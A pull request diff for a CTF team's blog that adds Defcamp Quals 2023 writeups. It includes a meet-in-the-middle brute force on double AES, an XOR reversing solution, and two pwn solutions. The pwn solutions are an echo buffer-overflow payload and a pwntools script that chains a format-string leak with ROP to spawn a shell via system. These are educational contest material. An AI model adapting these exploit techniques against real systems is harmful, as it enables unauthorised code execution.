Merge pull request #69 from dothidden/67-refactor-defcamp-qual-2023

67 refactor defcamp qual 2023

config.yaml

@@ -5,7 +5,7 @@ buildDrafts: true
 copyright: .hidden
 
 params:
-  description: Adventures following the white rabbit
+  description: Adventures following the white rabbit...
   mode: toggle
   social:
     - name: GitHub
@@ -21,14 +21,14 @@ params:
     - name: sunbather
       link: https://github.com/costinteo
       picture: https://avatars.githubusercontent.com/u/39965799?v=4
-      tags: [ 'rev','crypto','pwn' ]
+      tags: [ 'pwn','rev','crypto' ]
       description:
         - bash wizard
         - video game enjoyer
     - name: zenbassi
       link: https://github.com/stefan-radu
       picture: https://avatars.githubusercontent.com/u/30214214?v=4
-      tags: [ 'forensics','pwn' ,'rev', 'misc' ]
+      tags: [ 'forensics','pwn','rev','misc' ]
       description:
         - likes vim a bit too much
         - into (film) photography
@@ -67,6 +67,12 @@ params:
       tags: ['web', 'pwn' ,'misc']
       description:
         - I don't know what I am doing
+    - name: Honesty
+      link: https://github.com/MxHonesty
+      picture: https://avatars.githubusercontent.com/u/11357963?v=4
+      tags: [ 'rev', 'pwn', 'network' ]
+      description:
+        - currently unwinding the stack
   excludedSections:
     - about
   homeWriteupCnt: 10

content/balsnctf_2023/merger_2077.md

@@ -2,7 +2,7 @@
 title: merger_2077
 date: 2023-10-09
 tags:
-  - reverse
+  - rev
 author: MettleSphee
 ---
 

content/defcamp_quals_2023/4aes.md

@@ -0,0 +1,98 @@
+---
+title: 4aes
+date: 2023-10-22T09:56:31+03:00
+description: Writeup for 4aes [Defcamp Quals 2023]
+author: sunbather
+tags:
+  - crypto
+draft: false
+---
+
+___
+
+## Challenge Description
+
+Chall:
+
+```py
+k1 = random1 + b"A"*29
+k2 = random2 + b"A"*29
+plain = b'This is a non-secret message....'
+cipher = AES(k1,AES(k2,plain)) # ECB mode
+print(plain,'\n',cipher)
+> b'7\xcf7\xce\xa6 \xbe\t\xba\x03\xe4\xac\x9e\x86\x85\xf5YZYa_7\xae\xa1\xe6\xc1\xd1\xad\xfb\x9c\x99s'
+```
+
+Flag:
+
+```py
+sha256 = hashlib.sha256(k1+k2).hexdigest()
+print("CTF{"+sha256+"}")
+```
+
+### Intuition
+
+We can use a meet-in-the-middle technique to bruteforce the missing bytes.
+
+### Solution
+
+Simple bruteforce script:
+
+```py
+#!/usr/bin/env python3
+from Crypto.Cipher import AES
+import hashlib
+from threading import Thread
+
+
+ct = b'7\xcf7\xce\xa6 \xbe\t\xba\x03\xe4\xac\x9e\x86\x85\xf5YZYa_7\xae\xa1\xe6\xc1\xd1\xad\xfb\x9c\x99s'
+plain = b'This is a non-secret message....'
+
+everything_dec = {}
+everything_enc = {}
+
+def find_dec():
+    for i in range(256):
+        for j in range(256):
+            for k in range(256):
+                r = bytes([i, j, k])
+                k2 = r + b"A"*29
+                d = AES.new(k2, AES.MODE_ECB)
+                dec = d.decrypt(ct[:16])
+                everything_dec[dec] = k2
+
+def find_enc():
+    for i in range(256):
+        for j in range(256):
+            for k in range(256):
+                r = bytes([i, j, k])
+                k1 = r + b"A"*29
+                e = AES.new(k1, AES.MODE_ECB)
+                enc = e.encrypt(plain[:16])
+                everything_enc[enc] = k1
+
+# Multi-thread them just for fun
+t1 = Thread(target=find_dec)
+t2 = Thread(target=find_enc)
+
+print("Starting threads...")
+
+t1.start()
+t2.start()
+
+t1.join()
+t2.join()
+
+print("Searching results...")
+
+for d in everything_dec.keys():
+    if d in everything_enc:
+        print("Found!")
+        print(everything_enc[d], everything_dec[d])
+```
+
+Then apply the transformations explained in the description.
+
+#### Flag
+
+```CTF{91e6611654e4fe66d6876f728b8dfd54999ed752f89239ab82ecd9e520c1e003}```

content/defcamp_quals_2023/awesomeone.md

@@ -0,0 +1,43 @@
+---
+title: Awesomeone
+date: 2023-10-22T15:39:52+03:00
+description: Writeup for Awesomeone [Defcamp Quals 2023]
+author: Honesty
+tags:
+  - rev
+draft: false
+---
+
+___
+
+## Challenge Description
+
+One would simply want to be with the rest.
+
+**NOTE:** The format of the flag is CTF{}, for example: CTF{foobar}. The flag must be submitted in full, including the
+CTF and curly bracket parts.
+
+## Intuition
+
+Decompiling the agoodone binary leads to the check_password function which uses the length of the encrypted flag in a
+xor operation together with the user input. The flag is encrypted but the length is constant allowing us to craft an
+input that can pass this check. The solution is then used as a xor cipher key on the encrypted flag leading us to the
+solution.
+
+## Solution
+
+Firstly we want to take a look at the decompiled binary using ghidra. User input is passed to check_password. This
+function is a check for the bitwise operation on line 16. Both c and len are derived from the user input, while
+enc_flag_length is always the same. We can determine enc_flag_length by following the enc_flag pointer leading us to the
+encrypted flag that is a null terminated string of 69 characters. We now know that enc_flag_length = 69 (0b01000101).
+The next step is crafting an input string that will validate the check on line 16. The string “D” is enough to validate
+this condition as “D” has ascii code of 68 xored with the length of 1 giving us 69 (0b01000101). Now we can copy the
+encrypted flag from ghidra as a byte string and use a xor decipher with 0b01000101 as a key giving us the final flag.
+
+![mainrev.png](/images/defcamp_quals_2023/mainrev.png)
+![password.png](/images/defcamp_quals_2023/password.png)
+
+### Flag
+
+`CTF{fc3a41a577ff10786a2fdbfcad18ef47ea78d426a47d097a49e3803f7e9c0e96}`
+

content/defcamp_quals_2023/baby-bof.md

@@ -0,0 +1,69 @@
+---
+title: baby-bof
+date: 2023-10-22T09:56:31+03:00
+description: Writeup for baby-bof [Defcamp Quals 2023]
+author: sunbather
+tags:
+  - pwn
+draft: false
+---
+
+___
+
+## Challenge Description
+
+This is a basic buffer overflow.
+
+Flag format: CTF{sha256}
+
+### Intuition
+
+By decompiling we see an obvious buffer overflow and a ``flag`` function that we can jump to.
+
+```c
+void flag(void)
+{
+  char local_98 [136];
+  FILE *local_10;
+
+  local_10 = fopen("flag.txt","r");
+  if (local_10 == (FILE *)0x0) {
+    puts("Well done!! Now use exploit remote! ");
+                    /* WARNING: Subroutine does not return */
+    exit(0);
+  }
+  fgets(local_98,0x80,local_10);
+  printf(local_98);
+  return;
+}
+
+
+/* Called by the main function */
+void vuln(void)
+{
+  char local_138 [304];
+
+  gets(local_138);
+  return;
+}
+
+```
+PIE is not enabled so we can just hardcode the addresses in an echo.
+
+### Solution
+
+Simply echo to the binary:
+```
+$ echo -ne 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x67\x07\x40\x00\x00\x00\x00\x00' | ./bof
+Please enter the flag: 
+Segmentation fault (core dumped)
+```
+This crashes because of alignment issues. Let's fix it with a ret gadget address (found with ROPGadget) to align it back:
+
+```
+echo -ne 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xde\x05\x40\x00\x00\x00\x00\x00\x67\x07\x40\x00\x00\x00\x00\x00' | ./bof
+```
+
+#### Flag
+
+```ctf{c7fabc6bfe7e4b40b78244854f95f089414bb8354e021f89fe632202bb35ef99}```

content/defcamp_quals_2023/bistro-v2.md

@@ -0,0 +1,128 @@
+---
+title: bistro-v2
+date: 2023-10-22T09:56:31+03:00
+description: Writeup for bistro-v2 [Defcamp Quals 2023]
+author: sunbather
+tags:
+  - pwn
+draft: false
+---
+
+___
+
+## Challenge Description
+
+Maybe you can get a free menu!!
+
+Flag format: CTF{sha256}
+
+### Intuition
+
+Checksec the binary to see what we have.
+
+```
+$ checksec restaurant-v2
+LIBC_FILE=/lib/x86_64-linux-gnu/libc.so.6
+RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH	Symbols		FORTIFY	Fortified	Fortifiable	FILE
+Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   82 Symbols	  No	0		4		restaurant-v2
+```
+It's the same binary as in ``bistro``, but with an added function that checks a "code". Let's check it:
+
+```c
+int main(int argc,char **argv)
+{
+  int iVar1;
+  ssize_t sVar2;
+  undefined4 in_register_0000003c;
+  char **argv-local;
+  int argc-local;
+  int not_flag;
+  int flag;
+  int fd;
+
+  init((EVP_PKEY_CTX *)CONCAT44(in_register_0000003c,argc));
+  fd = open("/dev/urandom",0);
+  if (fd == -1) {
+    puts("Open failed");
+    iVar1 = -1;
+  }
+  else {
+    sVar2 = read(fd,&flag,4);
+    if (sVar2 == 4) {
+      close(fd);
+      puts("Wellcome to the restaurant V2!");
+      fflush(stdout);
+      fgets(buff,0x400,stdin);
+      printf(buff);
+      puts("Show me your ticket to pass: ");
+      fflush(stdout);
+      __isoc99_scanf("%x",&not_flag);
+      if (flag == not_flag) {
+        restaurant();
+      }
+      else {
+        puts("Permission denied!\n");
+      }
+      iVar1 = 0;
+    }
+    else {
+      puts("Read failed\n");
+      iVar1 = -1;
+    }
+  }
+  return iVar1;
+}
+```
+So we just need to leak it with the vulnerable printf and write it correctly to pass the check. Then we run the same script as before but with some addresses changed.
+
+### Solution
+
+```py
+#!/usr/bin/env python3
+
+from pwn import *
+
+#target = process("./restaurant")
+target = remote("34.107.4.232", 31399)
+
+# Found with ROPGadget
+pop_rdi = p64(0x0000000000400b33)
+ret = p64(0x00000000004006ae) # align stack to 16-bytes again for system call
+
+# Found in the binary
+main_addr = p64(0x0040088a)
+puts_plt = p64(0x004006c0)
+puts_got = p64(0x00602018)
+
+# Leak the real code
+target.sendline(b"%9$x")
+code_leak = target.recvuntil(b"Show me your ticket to pass: ").split(b'\n')[1]
+
+# Send it when the binary asks for the ticket
+print(code_leak)
+target.sendline(code_leak)
+
+# Same exploit as in bistro, check that writeup
+target.sendline(b"3")
+payload = b"a" * 0x78 + pop_rdi + puts_got + puts_plt + main_addr # go back to main for more inputs
+target.sendline(payload)
+print(target.recvuntil(b">>"))
+print(target.recvline())
+puts_leak = u64(target.recvline().strip().split(b':')[1].ljust(8, b'\x00'))
+print(puts_leak)
+print(hex(puts_leak))
+
+system_addr = p64(puts_leak - 202064)
+print(system_addr)
+
+sh_addr = p64(puts_leak + 0x133418)
+
+payload = b"a" * 0x78 + ret + pop_rdi + sh_addr + system_addr
+
+target.sendline(payload)
+target.interactive()
+```
+
+#### Flag
+
+```CTF{04134a331cd5bed41dc418c04854ac3fd7e03148f0e61d74d61508f19b7c5933}```